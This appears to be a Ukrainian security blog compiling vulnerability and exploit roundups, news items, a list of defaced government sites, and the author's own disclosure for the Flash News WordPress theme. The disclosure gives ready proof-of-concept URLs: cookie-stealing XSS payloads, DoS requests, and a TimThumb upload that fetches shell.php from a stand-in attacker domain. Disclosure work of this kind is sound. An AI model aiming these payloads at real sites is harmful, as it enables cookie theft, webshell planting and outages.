Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• DoS/Authorization Bypass in Samsung Kies Air (деталі)
• Cross-site Scripting in iTop (деталі)
• libunity-webapps vulnerability (деталі)
• DigiLIBE Management Console - Execution After Redirect (EAR) Vulnerability (деталі)
• Insecure default WPA2 passphrase in multiple Belkin wireless routers (деталі)
• movabletype-opensource security update (деталі)
• Microsoft Security Bulletin MS12-062 - Important Vulnerability in System Center Configuration Manager Could Allow Elevation of Privilege (2741528) (деталі)
• ganglia security update (деталі)
• Lynx vulnerabilities (деталі)
• nCircle PureCloud Vulnerability Scanner - Multiple Web Vulnerabilities (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Cardoza, WordPress Uploader та Xerte Online. Для котрих з’явилися експлоіти. Cardoza - це плагін для голосування, WordPress Uploader - це плагін для завантаження файлів (це php-експлоіт для даного плагіна), Xerte Online - це плагін для електронного навчання.

• Multiple SQL injection vulnerabilities in Cardoza Wordpress poll plugin (деталі)
• WordPress Uploader 1.0.4 Shell Upload (деталі)
• WordPress Xerte Online 0.32 Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

За повідомленням www.xakep.ru, Євросоюз рекомендує відмовитися від американських хмарних хостингів.

Європейцям краще не зберігати файли на хмарних хостингах американських компаній, попереджають чиновники. Причина - безпека даних.

Питання обговорювалося на конференції “Комп’ютери, приватність і захист даних” (Computers, Privacy and Data Protection), що пройшла 23-25 січня в Брюсселі. Зокрема, на пленарному засіданні по питанню хмарних обчислень і суверенітету інформації йшлося про шпигунство за європейськими користувачами з боку третіх країн.

Окрім того, що американські спецслужби можуть отримати доступ до ваших даних на хмарних сервісах, також до даних можуть дістатися хакери. Як це трапилося з витоком даних в Dropbox.

За повідомленням ain.ua, в офіс хостинг-провайдера Primaryhost прийшли з обшуком силовики, вилучені сервери.

Робота хостинг-провайдера Primaryhost.com.ua припинена: в січні в офіс компанії в Овручі прийшли представники Житомирського слідчого управління МВС із постановою суду про блокування сайта. Сервери віртуального хостинга і сервер баз даних відключені і вивезені в невідомому напрямку.

Типово для наших силових структур, що замість блокування доступу до одного сайта, вони забрали весь сервер (на якому на віртуальному хостингу знаходилося багато сайтів). Навіть попри те, що постанова суду була саме про блокування сайта . За останні роки вже неодноразово траплялися вилучення серверів (або жорстких дисків з них) з веб сайтами. І лише були поодинокі випадки саме блокування веб сайтів. Нашим правоохоронцям вже слід навчитися використовувати саме блокування замість вилучення.

Як я розповідав в своїх публікаціях з 2008 року, через розміщення протизаконних матеріалів можуть закрити сайт (або навіть можуть провести вилучення серверів у хостера). Наприклад, через розміщення вірусів.

За повідомленням www.xakep.ru, Pwn2Own 2013: взломай браузер і отримай 100 тисяч доларів.

На початку березня відбудеться хакерська конференція CanSecWest 2013 у канадському Ванкуверу, де традиційно пройде конкурс по взлому браузерів Pwn2Own. Власне, цей конкурс і приніс популярність рядовій конференції, і він є там самою цікавою подією.

Умови конкурсу Pwn2Own 2013 залишаються колишніми: потрібно взламати останню версію браузера на цілком пропатченій операційній системі. Якщо вам удалося взломати ноутбук - ви одержуєте цей ноутбук у подарунок. У порівнянні з минулим роком, додався Google Chrome і три плагіна.

02.02.2013

У січні, 18.01.2013, вийшов Mozilla Firefox 18.0.1. Нова версія браузера вийшла лише через десять днів після виходу Firefox 18 і в ній виправлені деякі баги допущені в останньому релізі.

Mozilla представила коригувальний випуск Firefox 18.0.1 у якому усунуто декілька недоробок, що впливають на якість роботи. Вирішені 4 проблеми в коді підтримки роботи через HTTP-проксі (витік пам’яті, проблеми в автоконфігурації); відключена підтримка HIDPI для зовнішніх моніторів для виключення помилкового рендеринга (наприклад, підказка виводилася на іншому екрані); виправлена помилка, що приводила до краху програвача Unity на платформі Mac OS X.

Хоча Мозіла і не відзначила серед виправлень жодних пов’язаних з безпекою браузера, на мій погляд в даному релізі є й секюріті виправлення. Зокрема це стосується витоків пам’яті при роботі з HTTP-проксі та краху Unity веб плеєра.

• Обновление Firefox 18.0.1 (деталі)

15.03.2013

Вже 05.02.2013 вийшов Mozilla Firefox 18.0.2. Нова версія браузера вийшла через 26 днів після виходу Firefox 18 і через 16 днів після виходу версії 18.0.1, і в ній виправлені чергові баги.

Mozilla представила коригувальний випуск Firefox 18.0.2 у якому усунуті проблеми зі стабільністю робити браузера. Це вибивання браузера при виконанні JavaScript. Цього разу розробники занесли багато багів в один (подібно до того, як вони це роблять з дірками) і виправили їх одним патчем. Хоча Мозіла і не відзначила це як виправлення безпеки, що типово для неї, але я відношу це до секюріті виправлення (бо це були DoS в браузері).

В даній добірці експлоіти в веб додатках:

• Joomla Component com_dv Arbitrary File Upload Vulnerability metasploit (деталі)
• Joomla mega menu module File Upload Vulnerability metasploit (деталі)
• Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass (деталі)
• Ruby On Rails XML Processor YAML Deserialization Code Execution (деталі)
• Novell Groupwise Internet Agent LDAP BIND Request Overflow Vulnerability (деталі)

Сьогодні я дослідив Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service, Arbitrary File Upload та Information Leakage уразливості в темі Flash News для WordPress. А знайшов я уразливоті в цій темі від WooThemes ще у лютому 2011, коли виявив дірки в TimThumb (та деякі дірки у квітні), а цього разу я дослідив й інші дірки в цій темі.

В інших темах від WooThemes аналогічна ситуація (раніше я привів перелік 89 уразливих тем для WP від них).

XSS (WASC-08):

http://site/wp-content/themes/flashnews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/flashnews/thumb.php?src=1
http://site/wp-content/themes/flashnews/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/flashnews/thumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/flashnews/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

DoS (WASC-10):

http://site/wp-content/themes/flashnews/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

Arbitrary File Upload (WASC-31) (в невиправлених версіях TimThumb):

http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/themes/flashnews/

Окрім index.php також можливі FPD в інших php-файлах в цій темі.

Information Leakage (WASC-13):

http://site/wp-content/themes/flashnews/includes/test.php

XSS (WASC-08) (в PHP < 4.4.1, 4.4.3-4.4.6):

http://site/wp-content/themes/flashnews/includes/test.php?a[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливі всі версії теми Flash News для WordPress (в останніх версіях виправлені лише уразливості в thumb.php).

Виявлені численні уразливості безпеки в Adobe ColdFusion.

Уразливі версії: Adobe ColdFusion 9.0, ColdFusion 10.

Обхід аутентифікації, підвищення привілеїв, витік інформації.

• Многочисленные уязвимости безопасности в Adobe ColdFusion (деталі)

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://civic.kmu.gov.ua (хакером HTC 28 DZ) - 26.09.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://ladrada.gov.ua (хакером SanFour25) - 04.11.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://nmckherson.gov.ua (хакером SanFour25) - 04.11.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://postsense.net (хакером hacker)
• http://glambaby.com.ua (хакерами з 1923Turk) - 10.12.2012, зараз сайт вже виправлений адмінами

В даній добірці уразливості в веб додатках:

• Directory Traversal Vulnerability in Sitecom Home Storage Center (деталі)
• Apache CouchDB JSONP arbitrary code execution with Adobe Flash (деталі)
• Directory Traversal Vulnerability in Conceptronic GrabnGo Network Storage (деталі)
• Apache CouchDB DOM based Cross-Site Scripting via Futon UI (деталі)
• QNAP Turbo NAS Multiple Path Injection (деталі)
• Apache CouchDB Information disclosure via unescaped backslashes in URLs on Windows (деталі)
• Multiple cross-site scripting (XSS) vulnerabilities in Transmission (деталі)
• SQL Injection Vulnerability in ImageCMS (деталі)
• Microsoft Security Bulletin MS12-061 - Important Vulnerability in Visual Studio Team Foundation Server Could Allow Elevation of Privilege (2719584) (деталі)
• Cross-Site Scripting (XSS) vulnerability in gpEasy (деталі)